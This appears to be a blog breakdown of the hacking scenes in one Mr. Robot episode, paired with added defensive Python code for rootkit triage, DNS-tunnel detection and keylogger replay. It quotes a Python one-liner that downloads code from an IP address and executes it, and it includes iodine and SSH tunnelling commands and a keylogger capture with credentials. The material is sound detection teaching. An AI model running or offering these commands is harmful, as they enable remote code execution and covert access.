Mr. Robot Disassembled: eps3.8_stage3.torrent

Hunting for a rootkit

Elliot uses Volatility to hunt for evidence of a rootkit in memory
vol.py -f out.mem --profile=kali linux_find_file -i 0xffff880028c740c0 -O ld.so.preload
Output of the Volatility process listing plugin, “linux_psaux”, revealing a Python-based backdoor
python -c import urllib;exec urllib.urlopen("http://192.251.68.228/index").read()
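Two of the artifacts Elliot pulls out of the memory image are exactly the ones a responder triages first on a Linux host: the contents of ld.so.preload (a user-land rootkit commonly hooks libc by listing its shared object there) and the process listing, where a download-and-execute interpreter one-liner like the one above never leaves a script on disk. The following is an added example, not code from the article, the show, or Volatility; the ld.so.preload contents, the psaux-style listing and the trusted-directory list are constructed for illustration, and the column layout mimics `linux_psaux` only loosely.

```python
"""Triage of two artifacts recovered from a Linux memory image:
/etc/ld.so.preload contents and a linux_psaux-style process listing.
Added example; all sample data below is constructed."""
import os
import re

# Constructed ld.so.preload contents. A preload rootkit typically drops its
# shared object somewhere writable and adds that path here.
SAMPLE_LD_SO_PRELOAD = """\
/usr/lib/x86_64-linux-gnu/libfakeroot/libfakeroot-sysv.so
# comment lines and blank lines are ignored by the loader

/tmp/.x/libsel.so
"""

# Constructed listing in the style of `linux_psaux` (pid, uid, gid, arguments).
# Quotes are absent because psaux reconstructs argv, not the original shell line.
SAMPLE_PSAUX = """\
Pid    Uid    Gid    Arguments
1      0      0      /sbin/init
812    0      0      /usr/sbin/sshd -D
1337   0      0      python -c import urllib;exec urllib.urlopen("http://192.251.68.228/index").read()
2001   1000   1000   /usr/bin/python /home/user/backup.py --dry-run
"""

# Assumption: directories where a legitimately preloaded library is expected to live.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def parse_ld_so_preload(text):
    """Return the library paths listed in ld.so.preload, one per line,
    ignoring blank lines and '#' comments."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            paths.append(line)
    return paths


def suspicious_preloads(text):
    """Flag preload entries that live outside the trusted library directories."""
    return [p for p in parse_ld_so_preload(text)
            if not p.startswith(TRUSTED_LIB_DIRS)]


# Interpreters that accept inline code, and the flag that introduces it.
INLINE_INTERPRETER = re.compile(r"^(python[\d.]*|perl|ruby|php)$")
INLINE_FLAGS = ("-c", "-e", "-r")
# Inline code that both fetches something remote and hands it to exec/eval.
FETCH = r"(urlopen|urllib|requests\.get|curl|wget)"
RUN = r"(exec|eval)"
DOWNLOAD_EXEC = re.compile(FETCH + r".*?" + RUN + r"|" + RUN + r".*?" + FETCH)


def parse_psaux(text):
    """Parse psaux-style rows into (pid, uid, gid, argument string)."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit():
            pid, uid, gid, args = parts
            rows.append((int(pid), int(uid), int(gid), args))
    return rows


def flag_download_and_exec(text):
    """Return pids whose command line is an interpreter one-liner that
    downloads code and executes it in memory."""
    hits = []
    for pid, _uid, _gid, args in parse_psaux(text):
        argv = args.split()
        if len(argv) < 3 or argv[1] not in INLINE_FLAGS:
            continue
        if not INLINE_INTERPRETER.match(os.path.basename(argv[0])):
            continue
        if DOWNLOAD_EXEC.search(" ".join(argv[2:])):
            hits.append(pid)
    return hits


if __name__ == "__main__":
    print("suspicious preloads:", suspicious_preloads(SAMPLE_LD_SO_PRELOAD))
    print("download-and-exec pids:", flag_download_and_exec(SAMPLE_PSAUX))
```

The preload check is deliberately path-based: a library listed in ld.so.preload that is not in a system library directory is worth pulling out of the image (as the `linux_find_file` step above does) regardless of its name, and the process check keys on the combination of an inline-code flag with a fetch-then-exec pattern rather than on any particular URL, so it catches the same technique when the address changes.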

Crafting an exploit

Tools of the trade for vulnerability research: afl-fuzz and gdb
Original mock-up for afl-fuzz screens
Segmentation fault in evince after loading one of the malformed inputs generated by afl-fuzz
Original mock-up — Elliot doing some additional crash analysis with gdb-peda
Shellcode in Elliot’s PDF exploit for “evince”

Hacking back (with tunnels in tunnels)

A Dark Army operator takes the bait and opens Elliot’s PDF
Elliot connects to the Dark Army operator’s infected system
root@kali:~# iodined -f 172.17.0.1 u1rbr0uz.net
Enter password:
Opened dns0
Setting IP of dns0 to 172.17.0.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain test.com
root@kali:~# ssh garyhost@172.17.0.2 -q -C -D 22381
Welcome to Ubuntu Kylin 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
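The iodine session above is what a DNS tunnel looks like from the operator's side: IP traffic is chopped into chunks, encoded into the labels of queries for the tunnel domain, and carried over unusual record types, with the SSH SOCKS proxy riding inside. From a resolver log the same session stands out as many queries to one registered domain with long, high-entropy subdomains. The detector below is an added example, not code from the article or from iodine; the resolver log format (epoch, client, query type, name) and the sample lines are constructed, with the tunnel domain from the show and base32 digests standing in for encoded payload chunks.

```python
"""Flag DNS tunnel candidates in a resolver log by per-domain query volume,
subdomain length and character entropy. Added example; sample log constructed."""
import base64
import hashlib
import math
from collections import defaultdict


def _payload_label(i):
    """Constructed stand-in for an encoded tunnel chunk: 52 base32 characters."""
    digest = hashlib.sha256(f"chunk-{i}".encode()).digest()
    return base64.b32encode(digest).decode().lower().rstrip("=")[:52]


# Constructed log lines: "<epoch> <client> <qtype> <qname>".
_LINES = [
    "1509000001 10.0.0.5 A www.example.com",
    "1509000001 10.0.0.5 AAAA www.example.com",
    "1509000003 10.0.0.5 A mail.example.org",
    "1509000004 10.0.0.7 A d1a2b3c4d5e6f7a8.cloudfront.net",
    "1509000005 10.0.0.7 A d1a2b3c4d5e6f7a8.cloudfront.net",
]
_LINES += [f"15090000{10 + i:02d} 10.0.0.5 NULL {_payload_label(i)}.u1rbr0uz.net"
           for i in range(8)]
SAMPLE_DNS_LOG = "\n".join(_LINES) + "\n"


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Parse log lines into (epoch, client, qtype, normalized qname)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            ts, client, qtype, qname = parts
            rows.append((int(ts), client, qtype.upper(), qname.rstrip(".").lower()))
    return rows


def split_name(qname):
    """Return (subdomain, registered domain). Assumption: the registered
    domain is the last two labels; a public-suffix list would be more exact."""
    labels = qname.split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def dns_tunnel_candidates(text, min_queries=5, min_avg_len=30, min_entropy=3.5):
    """Return {domain: stats} for domains whose queries look like a tunnel:
    enough of them, with long subdomains whose characters are near-random."""
    per_domain = defaultdict(lambda: {"n": 0, "len": 0, "ent": 0.0,
                                      "types": set(), "clients": set()})
    for _ts, client, qtype, qname in parse_log(text):
        sub, domain = split_name(qname)
        d = per_domain[domain]
        d["n"] += 1
        d["len"] += len(sub)
        d["ent"] += shannon_entropy(sub.replace(".", ""))
        d["types"].add(qtype)
        d["clients"].add(client)
    flagged = {}
    for domain, d in per_domain.items():
        avg_len = d["len"] / d["n"]
        avg_ent = d["ent"] / d["n"]
        if d["n"] >= min_queries and avg_len >= min_avg_len and avg_ent >= min_entropy:
            flagged[domain] = {"queries": d["n"],
                               "avg_subdomain_len": round(avg_len, 1),
                               "avg_entropy": round(avg_ent, 2),
                               "qtypes": sorted(d["types"]),
                               "clients": sorted(d["clients"])}
    return flagged


if __name__ == "__main__":
    for domain, stats in dns_tunnel_candidates(SAMPLE_DNS_LOG).items():
        print(domain, stats)
```

The three thresholds work together: CDN hostnames have long-ish labels but low entropy and few queries, while a tunnel needs sustained volume and cannot avoid high-entropy labels because the labels carry the data. The record type is reported rather than used as a criterion, since iodine can fall back to TXT, CNAME or A records when NULL queries are blocked.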
Elliot searches through the keylogger output file. Fans of the ARG might want to try connecting to that IP…
192.251.68.236[ENTR]
garyhost[ENTR]
huntr[BS]er3[BS]2[ENTR]
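A keylogger transcript like the one above records keystrokes, not the text the victim ended up submitting: backspaces and corrections are interleaved with the characters, so an analyst reviewing recovered keylogger output (to work out which hosts and accounts were exposed and need rotating) has to replay it. The replay below is an added example, not code from the article or the show; the `[ENTR]`/`[BS]` token syntax is taken from the screenshot, the `[TAB]`/`[ESC]` tokens are an assumption about what such a log might also contain, and the sample transcript is the one shown above.

```python
"""Replay a keylogger transcript into the lines the victim actually submitted.
Added example; token names beyond [ENTR] and [BS] are assumptions."""
import re

# Constructed copy of the transcript shown in the screenshot.
SAMPLE_KEYLOG = """\
192.251.68.236[ENTR]
garyhost[ENTR]
huntr[BS]er3[BS]2[ENTR]
"""

# A bracketed special key, or any single literal character.
TOKEN = re.compile(r"\[(ENTR|BS|TAB|ESC)\]|.", re.DOTALL)


def tokenize(text):
    """Yield ('key', name) for special keys and ('char', c) for literals.
    Physical newlines in the log file are formatting only and are dropped."""
    for m in TOKEN.finditer(text.replace("\r", "").replace("\n", "")):
        if m.group(1):
            yield ("key", m.group(1))
        else:
            yield ("char", m.group(0))


def replay_keystrokes(text):
    """Apply the keystrokes in order: characters append to an edit buffer,
    [BS] deletes the previous character (a no-op on an empty buffer),
    [ENTR] commits the buffer as one submitted line, [TAB]/[ESC] are ignored.
    Returns the submitted lines plus any uncommitted tail."""
    submitted, buf = [], []
    for kind, value in tokenize(text):
        if kind == "char":
            buf.append(value)
        elif value == "ENTR":
            submitted.append("".join(buf))
            buf = []
        elif value == "BS":
            if buf:
                buf.pop()
        # TAB / ESC: no effect on the text buffer
    if buf:
        submitted.append("".join(buf))
    return submitted


def correction_count(text):
    """Number of backspaces: a rough signal of how much the raw transcript
    differs from what was submitted, useful when prioritizing review."""
    return sum(1 for kind, value in tokenize(text) if kind == "key" and value == "BS")


if __name__ == "__main__":
    for line in replay_keystrokes(SAMPLE_KEYLOG):
        print(repr(line))
    print("corrections:", correction_count(SAMPLE_KEYLOG))
```

Replaying rather than stripping the tokens matters: a naive removal of `[BS]` markers would leave the third entry as `huntrer32`, which is not what was typed into the login prompt, and an analyst working from that would notify the wrong account owner or miss the credential entirely.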
Original mock-up of the Dark Army’s master control panel.
Web-based control panel for the “Beta Bot” botnet

Ryan Kazanciyan, CISO @ Wiz.io, and tech consultant for @whoismrrobot S2 & S3.
